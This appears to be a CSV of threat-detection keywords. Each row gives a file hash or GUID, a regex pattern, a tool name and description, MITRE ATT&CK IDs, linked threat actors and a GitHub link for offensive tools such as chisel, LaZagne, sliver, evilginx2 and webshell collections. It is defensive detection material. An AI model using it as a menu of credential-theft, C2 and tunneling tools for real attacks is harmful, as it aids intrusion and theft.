"*984f119adf8040c9c400f4fdb937bd99a7a26ce18db101b330472dd9ca4b52f3*",".{0,1000}984f119adf8040c9c400f4fdb937bd99a7a26ce18db101b330472dd9ca4b52f3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31580"
"*985976339729a11396ed9c207afa49b16961aef42db3ee69066d2d2a5c69bfde*",".{0,1000}985976339729a11396ed9c207afa49b16961aef42db3ee69066d2d2a5c69bfde.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31582"
"*98599d98012adc240e17c6b157e52bdf7b1831e45164d4b27862189c462392d4*",".{0,1000}98599d98012adc240e17c6b157e52bdf7b1831e45164d4b27862189c462392d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31583"
"*985ac7064c18852f34f9243d5d51703fca8e5540efe1d01a259640b5798c2724*",".{0,1000}985ac7064c18852f34f9243d5d51703fca8e5540efe1d01a259640b5798c2724.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31584"
"*985f61fb06d7878172ab9e204eb42ddb76d299c69b7070c4abb26c3ab39873c8*",".{0,1000}985f61fb06d7878172ab9e204eb42ddb76d299c69b7070c4abb26c3ab39873c8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31585"
"*9861d10bbed4f966d0173aa361530189107a31e37478464d8ef4bda189252214*",".{0,1000}9861d10bbed4f966d0173aa361530189107a31e37478464d8ef4bda189252214.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31586"
"*9865ed1503bfac59d77f262ec4d443bc2eef2e850120ca601d406ff8d61c8bbb*",".{0,1000}9865ed1503bfac59d77f262ec4d443bc2eef2e850120ca601d406ff8d61c8bbb.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","31588"
"*987001995ecb92cb1fa659097e4be63c46568c00e4f91ed0162d0ed973831c50*",".{0,1000}987001995ecb92cb1fa659097e4be63c46568c00e4f91ed0162d0ed973831c50.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","31589"
"*9870daa238c3cab7fa949a1f8b80d3451c78eb07d18030ad061d8b91d612decc*",".{0,1000}9870daa238c3cab7fa949a1f8b80d3451c78eb07d18030ad061d8b91d612decc.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","31590"
"*9877b56ae67e7621ad2dddc906db9e35eb13fb7cac6cab92b1931d6bcfe9d3d2*",".{0,1000}9877b56ae67e7621ad2dddc906db9e35eb13fb7cac6cab92b1931d6bcfe9d3d2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31592"
"*9877ed9aec8766036bb9dd702e41433916a6d6c886ff55eea07fce92bcbf6b29*",".{0,1000}9877ed9aec8766036bb9dd702e41433916a6d6c886ff55eea07fce92bcbf6b29.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","31593"
"*987d8536a5a920ff49ab1d0948bc5d7c45a7610b2737e407971c361d7072485a*",".{0,1000}987d8536a5a920ff49ab1d0948bc5d7c45a7610b2737e407971c361d7072485a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31594"
"*987d9b6f804800af119f8f286976ae67a3ce09e2b54170511afa8307fe40f70c*",".{0,1000}987d9b6f804800af119f8f286976ae67a3ce09e2b54170511afa8307fe40f70c.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","31595"
"*987ebc109f9bb594b780a59dbe5f5b5c3694f5ac21bb0bd044b4e06ccb64bdab*",".{0,1000}987ebc109f9bb594b780a59dbe5f5b5c3694f5ac21bb0bd044b4e06ccb64bdab.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#filehash","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","31596"
"*98900e81fda3f034d4b54e347f69f78be803fbc76df09fc75ba56329bb21c03c*",".{0,1000}98900e81fda3f034d4b54e347f69f78be803fbc76df09fc75ba56329bb21c03c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31600"
"*989080753be26eaa2b93d3a01bd4296874162f06d126f78be96749fb95c66aef*",".{0,1000}989080753be26eaa2b93d3a01bd4296874162f06d126f78be96749fb95c66aef.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","31601"
"*989A9793-63FC-4639-8A8D-E4BB9F60F137*",".{0,1000}989A9793\-63FC\-4639\-8A8D\-E4BB9F60F137.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","31604"
"*989c13f0254e514c0ac261973a6d736917bf10af88b3ded86df954305b838640*",".{0,1000}989c13f0254e514c0ac261973a6d736917bf10af88b3ded86df954305b838640.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31605"
"*989cb6a23ecba5fb7785a1e23b61b84c12ff45723eb98bb885905768e0a9550a*",".{0,1000}989cb6a23ecba5fb7785a1e23b61b84c12ff45723eb98bb885905768e0a9550a.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","#filehash","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","31606"
"*989e7ae1b470f2f483683ff46c38dafc347b6a541d3054ccb8c1ab5e208876b8*",".{0,1000}989e7ae1b470f2f483683ff46c38dafc347b6a541d3054ccb8c1ab5e208876b8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31607"
"*98a6c8b05256efdf08b252f191b7fefbc76486301fca678a442d2a9ef6393650*",".{0,1000}98a6c8b05256efdf08b252f191b7fefbc76486301fca678a442d2a9ef6393650.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","31608"
"*98aa35c31f41c95a5516b0cbb52bf6d429f96919d665c6a45a89a5559550639c*",".{0,1000}98aa35c31f41c95a5516b0cbb52bf6d429f96919d665c6a45a89a5559550639c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31609"
"*98aa8eec1bda59ea57693a6312bae2b76b2e71dd29cd0f85453c3d867ec69394*",".{0,1000}98aa8eec1bda59ea57693a6312bae2b76b2e71dd29cd0f85453c3d867ec69394.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","#filehash","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","31610"
"*98ad711010195669ee57216b2b376e81fec7437ceab10ab369fee7598d931a1a*",".{0,1000}98ad711010195669ee57216b2b376e81fec7437ceab10ab369fee7598d931a1a.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","31612"
"*98b1b6fb910bda21e3e331382c73dd81f5bd9f36165b1719f446ea9e253f0f16*",".{0,1000}98b1b6fb910bda21e3e331382c73dd81f5bd9f36165b1719f446ea9e253f0f16.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","31613"
"*98b4b0f773391657d762c06de6aa9710e7f56d64a0fd720d1a68e733a8173062*",".{0,1000}98b4b0f773391657d762c06de6aa9710e7f56d64a0fd720d1a68e733a8173062.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","31615"
"*98c5018947477f613943240fb4c19347e2ca720850a078d959df5fd3be8ef4dd*",".{0,1000}98c5018947477f613943240fb4c19347e2ca720850a078d959df5fd3be8ef4dd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31618"
"*98ca478259d56946281a780fe164c4415dd7dda9e4802b547b4622a8378b15b0*",".{0,1000}98ca478259d56946281a780fe164c4415dd7dda9e4802b547b4622a8378b15b0.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","31619"
"*98d26f3cd9d1e221c76a2b274950d73085f8dd17a2eaceffda43cf5c5a45bdc2*",".{0,1000}98d26f3cd9d1e221c76a2b274950d73085f8dd17a2eaceffda43cf5c5a45bdc2.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","31620"
"*98d590b2d7e7ee6c87e251a26f155e9c20765829e8ac291092d139aaa6fae676*",".{0,1000}98d590b2d7e7ee6c87e251a26f155e9c20765829e8ac291092d139aaa6fae676.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","31622"
"*98e8bbdf74db34c8ebddf41e0f5574033df9d7c1390e37bcbe0466ce1705c6e4*",".{0,1000}98e8bbdf74db34c8ebddf41e0f5574033df9d7c1390e37bcbe0466ce1705c6e4.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","31623"
"*98f2b951313b8535bf4a2b0310f59426168b8e2792513d7aed4fa6f16d9fe9a3*",".{0,1000}98f2b951313b8535bf4a2b0310f59426168b8e2792513d7aed4fa6f16d9fe9a3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31624"
"*98f65ce7ce360459e9b05b8082d13b27a37efaf63213f80a89b2e22a6a0c38ea*",".{0,1000}98f65ce7ce360459e9b05b8082d13b27a37efaf63213f80a89b2e22a6a0c38ea.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31625"
"*98f7e2c5724e79af170510f1f694fb61181ea985d4964286ca3865e2e0de690d*",".{0,1000}98f7e2c5724e79af170510f1f694fb61181ea985d4964286ca3865e2e0de690d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31626"
"*98fa9af535fd48260a65e18ceb9553187786742c6c77486bb27e5fe61758ea77*",".{0,1000}98fa9af535fd48260a65e18ceb9553187786742c6c77486bb27e5fe61758ea77.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31628"
"*98fd92a470168082d4a64840e28e80f6cc114969d1f9c9deb2bc9585438ba9e2*",".{0,1000}98fd92a470168082d4a64840e28e80f6cc114969d1f9c9deb2bc9585438ba9e2.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","31629"
"*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*",".{0,1000}99\$1a7F1qr2HihoXfs\/56u5XMdpDZ83N6hW\/HI\=.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","31631"
"*990953dcf64c26cb505d9c19202b849c7f7131209cba13665e91ef500fc266eb*",".{0,1000}990953dcf64c26cb505d9c19202b849c7f7131209cba13665e91ef500fc266eb.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","31633"
"*990d5ff1bf1055bd4796de41e1fc6a31dbe60d11e15e64f1eb46cde01fbb4c68*",".{0,1000}990d5ff1bf1055bd4796de41e1fc6a31dbe60d11e15e64f1eb46cde01fbb4c68.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31634"
"*9915aa1e343c454c31a1011d51fa3f3410a54cc70256d232d2b7a00bd1bd5583*",".{0,1000}9915aa1e343c454c31a1011d51fa3f3410a54cc70256d232d2b7a00bd1bd5583.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","31636"
"*99164a220ff13f15d76096ec91b472b2ed8fd5670491f5baf073158b92e11374*",".{0,1000}99164a220ff13f15d76096ec91b472b2ed8fd5670491f5baf073158b92e11374.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31637"
"*99187ebc1fadec7a7fdcd0a201d75776efb53514fa56b515cab6ca6e2783a402*",".{0,1000}99187ebc1fadec7a7fdcd0a201d75776efb53514fa56b515cab6ca6e2783a402.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31638"
"*991f1ee0d29a4829661bd53b2cb04810c416466b74b190e6627fe99367ef24cc*",".{0,1000}991f1ee0d29a4829661bd53b2cb04810c416466b74b190e6627fe99367ef24cc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31641"
"*99238bd3e1c0637041c737c86a05bd73a9375abc9794dca71d2765e22d87537e*",".{0,1000}99238bd3e1c0637041c737c86a05bd73a9375abc9794dca71d2765e22d87537e.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","31642"
"*99292BAC-72B4-4AAB-9E5F-2BC1843C8EA3*",".{0,1000}99292BAC\-72B4\-4AAB\-9E5F\-2BC1843C8EA3.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#GUIDproject","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","31643"
"*992bbf36c83f56d459a79cd34638f7ba932ad4a313eb9a63c8a8cf111ef9497b*",".{0,1000}992bbf36c83f56d459a79cd34638f7ba932ad4a313eb9a63c8a8cf111ef9497b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31644"
"*99314a42485888cb1cf7197f43bccc1d285b116f7ec936fdf75a354df21376e6*",".{0,1000}99314a42485888cb1cf7197f43bccc1d285b116f7ec936fdf75a354df21376e6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31645"
"*99333bd2aadc9ebdbeb842981f1bb054f2102cdb94e77a0a8d7588cabaf70dc6*",".{0,1000}99333bd2aadc9ebdbeb842981f1bb054f2102cdb94e77a0a8d7588cabaf70dc6.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","31646"
"*99383be21201b97e739e06f5c89a815cd4a296030985505f238862aecbbb7a77*",".{0,1000}99383be21201b97e739e06f5c89a815cd4a296030985505f238862aecbbb7a77.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","#filehash","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","31647"
"*993cae56bdedd0dfb86e91e00180f0162fd0e79c6ee22f15fefdfbf1e10cf5f6*",".{0,1000}993cae56bdedd0dfb86e91e00180f0162fd0e79c6ee22f15fefdfbf1e10cf5f6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31648"
"*993e5580a5eecf984fad97f7925ee12f86f83f1088b56dd71645bf6deb97118c*",".{0,1000}993e5580a5eecf984fad97f7925ee12f86f83f1088b56dd71645bf6deb97118c.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31649"
